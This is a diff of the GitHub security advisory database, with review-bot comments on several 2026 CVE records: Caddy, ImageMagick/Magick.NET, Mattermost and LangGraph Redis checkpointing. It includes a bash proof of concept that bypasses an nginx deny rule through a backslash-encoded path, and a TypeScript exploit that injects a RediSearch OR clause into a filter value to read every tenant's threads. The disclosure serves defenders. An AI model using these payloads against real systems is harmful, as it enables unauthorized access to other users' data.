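Review bot: The `hello.leaf` PoC template in the details has lost its markup: only the text `Hover to see message` survives between the code fences, so the attribute that contains the user-controlled `msg` variable, which is the whole point of the example, is no longer visible; I infer the drop from the stranded text, and the upstream record should carry the element in a form that survives HTML sanitization. The Swift API is spelled `replacingOccurences` in three places and `esaping` appears once; the correct name is `replacingOccurrences`, which matters because readers will search the code for it. The replacement call also shows `with: \""\"`, which looks like a decoded HTML entity (most likely `&quot;`), so the quoted call no longer reads as the escaping it describes.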
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4hg8-92x6-h2f3",
- "modified": "2026-02-17T21:40:47Z",
+ "modified": "2026-02-20T16:44:19Z",
 "published": "2026-02-17T21:40:46Z",
 "aliases": [
 "CVE-2026-26319"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b"
@@ -64,6 +68,6 @@
 "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-17T21:40:46Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-19T23:16:24Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json b/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json
new file mode 100644
index 0000000000000..028ca0ae221b7
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json
@@ -0,0 +1,80 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4xrr-hq4w-6vf4",
+ "modified": "2026-02-24T20:16:56Z",
+ "published": "2026-02-24T20:16:55Z",
+ "aliases": [
+ "CVE-2026-27585"
+ ],
+ "summary": "Caddy: Improper sanitization of glob characters in file matcher may lead to bypassing security protections",
+ "details": "### Summary\n\nThe path sanitization in [file matcher](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361) doesn't sanitize backslashes which can lead to bypassing path related security protections.\n\n### Details\n\nThe [try_files](https://caddyserver.com/docs/caddyfile/directives/try_files) directive is used to rewrite the request uri. It accepts a list of patterns and checks if any files exist in the root that match the provided patterns. It's commonly used in Caddy configs. For example, it's used in SPA applications to rewrite every route that doesn't exist as a file to `index.html`. \n \n```caddy\nexample.com {\n\troot * /srv\n\tencode\n\ttry_files {path} /index.html\n\tfile_server\n}\n```\n\n`try_files` patterns are actually glob patterns and file matcher expands them. The `{path}` in the pattern is replaced with\nthe request path and then [is expanded by `fs.Glob`](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L398). The request path is sanitized before being placed inside the pattern and the special chars are escaped . [The following code](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361) is the sanitization part. 
\n\n```go\nvar globSafeRepl = strings.NewReplacer(\n\t\"*\", \"\\\\*\",\n\t\"[\", \"\\\\[\",\n\t\"?\", \"\\\\?\",\n)\n\nexpandedFile, err := repl.ReplaceFunc(file, func(variable string, val any) (any, error) {\n if runtime.GOOS == \"windows\" {\n return val, nil\n }\n switch v := val.(type) {\n case string:\n return globSafeRepl.Replace(v), nil\n case fmt.Stringer:\n return globSafeRepl.Replace(v.String()), nil\n }\n return val, nil\n})\n```\n\nThe problem here is that it does not escape backslashes. `/something-\\*/` can match a file named `something-\\-anything.txt`, but it should not. The primitive that this vulnerability provides is not very useful, as it only allows an attacker to guess filenames that contain a backslash and they should also know the characters before that backslash.\n\nThe backslash is mainly used to escape special characters in glob patterns, but when it appears before non special characters, it is ignored. This means that `h\\ello*` matches `hello world` even though `e` is not a special character. This behavior can be abused to bypass path protections that might be in place. For example, if there is a reverse proxy that only allows `/documents/*` to the internal network and its upstream is a Caddy server that uses `try_files`, the reverse proxy's protection can be bypassed by requesting the path `/do%5ccuments/`.\n\nSome configurations that implement blacklisting and serving together in Caddy are also vulnerable but there's a condition that the `try_files` directive and the filtering `route`/`handle` must not be in a same block because `try_files` directive [executes before `route` and `handle` directives](https://caddyserver.com/docs/caddyfile/directives#directive-order). 
\n\nFor example the following config isn't vulnerable.\n\n```caddy\n:80 {\n root * /srv\n\n route /documents/* {\n respond \"Access denied\" 403\n }\n\n try_files {path} /index.html\n file_server\n}\n```\n\nBut this one is vulnerable.\n\n```caddy\n:80 {\n root * /srv\n\n route /documents/* {\n respond \"Access denied\" 403\n }\n\n route /* {\n try_files {path} /index.html\n }\n file_server\n}\n```\n\nThis config is also vulnerable because `Header` directives executes before `try_files`. \n\n```caddy\n:80 {\n root * /srv \n header /uploads/* {\n X-Content-Type-Options \"nosniff\"\n Content-Security-Policy \"default-src 'none';\"\n }\n try_files {path} /index.html\n file_server\n}\n```\n\n### PoC\n\nPaste this script somewhere and run it. It should print \"some content\" which means that the nginx protection has failed.\n\n```bash\n#!/bin/bash\n\nmkdir secret\necho 'some content' > secret/secret.txt\n\ncat > Caddyfile <<'EOF'\n:80 {\n root * /srv\n\n try_files {path} /index.html\n file_server\n}\nEOF\n\ncat > nginx.conf <<'EOF'\nevents {}\n\nhttp {\n server {\n listen 80;\n \n location /secret {\n return 403;\n }\n\n location / {\n proxy_pass http://caddy;\n proxy_set_header Host $host;\n }\n }\n}\nEOF\n\ncat > docker-compose.yml <<'EOF'\nservices:\n caddy:\n # caddy@sha256:c3d7ee5d2b11f9dc54f947f68a734c84e9c9666c92c88a7f30b9cba5da182adb\n image: caddy:latest\n volumes:\n - ./Caddyfile:/etc/caddy/Caddyfile:ro\n - ./secret:/srv/secret:ro\n nginx:\n # nginx@sha256:341bf0f3ce6c5277d6002cf6e1fb0319fa4252add24ab6a0e262e0056d313208\n image: nginx:latest\n volumes:\n - ./nginx.conf:/etc/nginx/nginx.conf:ro\n ports:\n - \"8000:80\" \nEOF\n\ndocker compose up -d\ncurl 'localhost:8000/secre%5ct/secret.txt'\n```\n\n### Impact\n\nThis vulnerability may allow an attacker to bypass security protections. 
It affects users with specific Caddy and environment configurations.\n\n### AI Usage\n\nAn LLM was used to polish this report.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/caddyserver/caddy/v2/modules/caddyhttp/fileserver"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.11.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "< 2.11.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27585"
+ },
+ {
+ "type": "WEB",
+ "url": "https://caddyserver.com/docs/caddyfile/directives#directive-order"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/caddyserver/caddy"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L398"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-24T20:16:55Z",
+ "nvd_published_at": "2026-02-24T17:29:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json b/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json
new file mode 100644
index 0000000000000..4906b1a41a33a
--- /dev/null
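Review bot: The affected entry is internally inconsistent: the range ends at `"fixed": "2.11.1"`, which marks 2.11.0 as affected, while `"last_known_affected_version_range": "< 2.11.0"` excludes it; one of the two should change, e.g. `"last_known_affected_version_range": "<= 2.11.0"`, or the field can be dropped since an explicit `fixed` event already bounds the range. CWE-20 is a generic label for what the details describe as an incomplete escaping of glob metacharacters (backslash omitted from `globSafeRepl`); CWE-116 (Improper Encoding or Escaping of Output) would name the defect more precisely, though that is a classification preference. The summary, details and the v2.11.1 release reference otherwise agree on the root cause and fix.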
+++ b/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json 
@@ -0,0 +1,411 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-543g-8grm-9cw6",
+ "modified": "2026-02-24T15:37:53Z",
+ "published": "2026-02-24T15:37:53Z",
+ "aliases": [
+ "CVE-2026-25799"
+ ],
+ "summary": "ImageMagick has Division-by-Zero in YUV sampling factor validation, which leads to crash",
+ "details": "A logic error in YUV sampling factor validation allows an invalid sampling factor to bypass checks and trigger a division-by-zero during image loading, resulting in a reliable denial-of-service.\n\n```\ncoders/yuv.c:210:47: runtime error: division by zero\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==3543373==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x55deeb4d723c bp 0x7fffc28d34d0 sp 0x7fffc28d3320 T0)\n #0 0x55deeb4d723c in ReadYUVImage coders/yuv.c:210\n #1 0x55deeb751dff in ReadImage MagickCore/constitute.c:743\n #2 0x55deeb756374 in ReadImages MagickCore/constitute.c:1082\n #3 0x55deec682375 in CLINoImageOperator MagickWand/operation.c:4959\n #4 0x55deec6887ed in CLIOption MagickWand/operation.c:5473\n #5 0x55deec32843b in ProcessCommandOptions MagickWand/magick-cli.c:653\n #6 0x55deec32b99b in MagickImageCommand MagickWand/magick-cli.c:1392\n #7 0x55deec324d58 in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x55deead82519 in MagickMain utilities/magick.c:162\n #9 0x55deead828be in main utilities/magick.c:193\n #10 0x7fb90807fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #11 0x7fb90807fe3f in __libc_start_main_impl ../csu/libc-start.c:392\n #12 0x55deead81974 in _start (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x22fb974)\n\nAddressSanitizer can not provide additional info.\nSUMMARY: AddressSanitizer: UNKNOWN SIGNAL coders/yuv.c:210 in ReadYUVImage\n==3543373==ABORTING\n```",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-AnyCPU"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-AnyCPU"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-HDRI-x86"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-OpenMP-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-OpenMP-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-OpenMP-x86"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q16-x86"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-AnyCPU"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-OpenMP-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-OpenMP-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-arm64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-x64"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "Magick.NET-Q8-x86"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "14.10.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25799"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ImageMagick/ImageMagick"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-369"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-24T15:37:53Z",
+ "nvd_published_at": "2026-02-24T01:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json
new file mode 100644
index 0000000000000..c28727a9374af
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json
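Review bot: Every affected entry is a NuGet Magick.NET package fixed in 14.10.3, yet the summary and details describe the defect in ImageMagick's own `coders/yuv.c` and the only fix reference is an ImageMagick commit; the record never states which upstream ImageMagick release contains that commit, so ImageMagick consumers outside NuGet cannot tell from this advisory whether they are patched. Adding the upstream fixed version to `details`, or a `WEB` reference to the corresponding ImageMagick release, would close that gap. The ASan trace also embeds a reporter-local build path (`/data/ylwang/LargeScan/...`) in frame `#12`, which is harmless but could be trimmed when the upstream record is next edited.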
@@ -0,0 +1,141 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-57cc-2pf4-mhmx",
+ "modified": "2026-02-19T19:35:24Z",
+ "published": "2026-02-16T15:32:47Z",
+ "aliases": [
+ "CVE-2025-14350"
+ ],
+ "summary": "Mattermost fails to properly validate team membership when processing channel mentions",
+ "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate team membership when processing channel mentions which allows authenticated users to determine the existence of teams and their URL names via posting channel shortlinks and observing the channel_mentions property in the API response. Mattermost Advisory ID: MMSA-2025-00563",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost/server/v8"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "8.0.0-20251209134645-761e56bb11cc"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.1.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "< 11.1.3"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "< 10.11.10"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.2.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "< 11.2.2"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": 
"github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "5.3.2-0.20251209134645-761e56bb11cc"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14350"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mattermost/mattermost/commit/761e56bb11ccb751ddbe4bab5898ccc2b384fd82"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T19:35:24Z",
+ "nvd_published_at": "2026-02-16T13:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json
index 40168473dad55..78729e2a9fa3c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json
@@ -55,6 +55,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-22",
 "CWE-23"
 ],
 "severity": "HIGH",
diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json
new file mode 100644
index 0000000000000..fc0753303755a
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json
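Review bot: The three `github.com/mattermost/mattermost-server` entries introduced at `11.1.0`, `10.11.0` and `11.2.0` carry no `fixed` event, so an OSV consumer that does not read `database_specific` treats every later release as affected, including 11.1.3, 10.11.10 and 11.2.2, which the `last_known_affected_version_range` values mark as the first unaffected ones; the open `10.11.0` range also subsumes both 11.x ranges. If the database tooling accepts these tags as ECOSYSTEM versions for this module path, add the bound as an event, e.g. `{ "fixed": "11.1.3" }` after `"introduced": "11.1.0"`, and likewise for the other two entries. If it does not (presumably because only the `5.3.2-0.20251209134645-761e56bb11cc` pseudo-version resolves for a module path without a major-version suffix), a sentence in `details` naming 11.1.3, 10.11.10 and 11.2.2 as the patched releases would make the bound explicit for readers, since the current text only lists the last affected versions.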
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mx2-w598-339m", + "modified": "2026-02-23T22:20:29Z", + "published": "2026-02-18T22:40:09Z", + "aliases": [ + "CVE-2026-27022" + ], + "summary": "RediSearch Query Injection in @langchain/langgraph-checkpoint-redis", + "details": "## Summary\n\nA query injection vulnerability exists in the `@langchain/langgraph-checkpoint-redis` package's filter handling. The `RedisSaver` and `ShallowRedisSaver` classes construct RediSearch queries by directly interpolating user-provided filter keys and values without proper escaping. RediSearch has special syntax characters that can modify query behavior, and when user-controlled data contains these characters, the query logic can be manipulated to bypass intended access controls.\n\n## Attack surface\n\nThe core vulnerability was in the `list()` methods of both `RedisSaver` and `ShallowRedisSaver`: these methods failed to escape RediSearch special characters in filter keys and values when constructing queries. When unescaped data containing RediSearch syntax was used, the injected operators were interpreted by RediSearch rather than treated as literal search values.\n\nThis escaping bug enabled the following attack vector:\n\n- **Thread boundary escape via OR operator**: RediSearch uses `|` as an OR operator with specific precedence rules. A query like `A B | C` is interpreted as `(A AND B) OR C`. 
By injecting `}) | (@thread_id:{*` into a filter value, an attacker can append an OR clause that matches all threads, effectively bypassing the thread isolation constraint.\n\nThe injected query `(@thread_id:{legitimate-thread}) (@source:{x}) | (@thread_id:{*})` matches:\n\n- Documents with `thread_id:legitimate-thread AND source:x`, OR\n- Documents with ANY `thread_id`\n\nThe second clause matches all threads, bypassing thread isolation entirely.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n- **Pass user-controlled input to filter parameters** — When using `getStateHistory()` or `checkpointer.list()` with filter values derived from user input, HTTP parameters, or other untrusted sources.\n- **Use Redis checkpointing in multi-tenant applications** — Applications that rely on thread isolation to separate data between users or tenants are at risk of cross-tenant data access.\n\nThe most common attack vector is through API endpoints that expose filtering capabilities to end users, allowing them to search or filter their conversation history.\n\n## Impact\n\nAttackers who control filter input can bypass thread isolation by injecting RediSearch OR operators to construct queries that match all threads regardless of the intended thread constraint. 
This enables access to checkpoint data from threads the attacker is not authorized to view.\n\nKey severity factors:\n\n- Enables complete bypass of thread-based access controls\n- Sensitive conversation data from other users may be exposed\n- Affects multi-tenant applications relying on thread isolation for data separation\n- Requires only control over filter input values (common in user-facing APIs)\n\n## Exploit example\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\nconst saver = new RedisSaver({ /* redis config */ });\n\n// Normal usage - should only see thread \"user-123-thread\"\nconst legitHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: { source: \"loop\" }\n});\n\n// Attacker crafts malicious filter value\nconst attackerFilter = {\n source: \"x}) | (@thread_id:{*\" // Injects OR clause matching ALL threads\n};\n\n// This produces a query like:\n// (@thread_id:{user-123-thread}) (@source:{x}) | (@thread_id:{*})\n// Due to precedence, this matches ALL threads!\n\nconst stolenHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: attackerFilter\n});\n\n// stolenHistory now contains checkpoints from ALL threads - DATA LEAKED!\n```\n\n## Security hardening changes\n\nThe 1.0.2 patch introduces the following changes:\n\n- **Escape utility function**: A new `escapeRediSearchTagValue()` function properly escapes all RediSearch special characters (`- . < > { } [ ] \" ' : ; ! @ # $ % ^ & * ( ) + = ~ | \\ ? /`) by prefixing them with backslashes.\n- **Filter key escaping**: All filter keys are escaped before being used in query construction.\n- **Filter value escaping**: All filter values are escaped before being interpolated into RediSearch tag queries.\n\n## Migration guide\n\n### No changes needed for most users\n\nThe fix is backward compatible. 
Existing code will work without modifications—filter values that previously worked will continue to work, with the added protection against injection:\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\n// Works exactly as before, now with injection protection\nconst history = saver.list(config, {\n filter: { source: \"loop\" }\n});\n```\n\n### If you were relying on special characters\n\nIf your application intentionally used RediSearch syntax in filter values (unlikely but possible), be aware that these characters will now be escaped and treated as literals.\n\n### For applications with user-facing filters\n\nNo code changes required, but this is a good time to review your API design:\n\n```typescript\n// Before: Vulnerable to injection\napp.get(\"/history\", async (req, res) => {\n const history = await saver.list(config, {\n filter: req.query.filter // User-controlled - was vulnerable\n });\n});\n\n// After: Now safe, but consider validating allowed filter keys\napp.get(\"/history\", async (req, res) => {\n const allowedKeys = [\"source\", \"step\"];\n const sanitizedFilter = Object.fromEntries(\n Object.entries(req.query.filter || {})\n .filter(([key]) => allowedKeys.includes(key))\n );\n const history = await saver.list(config, {\n filter: sanitizedFilter\n });\n});\n```\n\n> **Recommendation**: Even with the fix in place, consider validating that filter keys are from an allowed list as a defense-in-depth measure.\n\n## References\n\n- [RediSearch Query Syntax](https://redis.io/docs/interact/search-and-query/query/)\n- [LangGraph Checkpoint Documentation](https://langchain-ai.github.io/langgraphjs/)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@langchain/langgraph-checkpoint-redis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": 
"1.0.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/langchain-ai/langgraphjs/pull/1943"
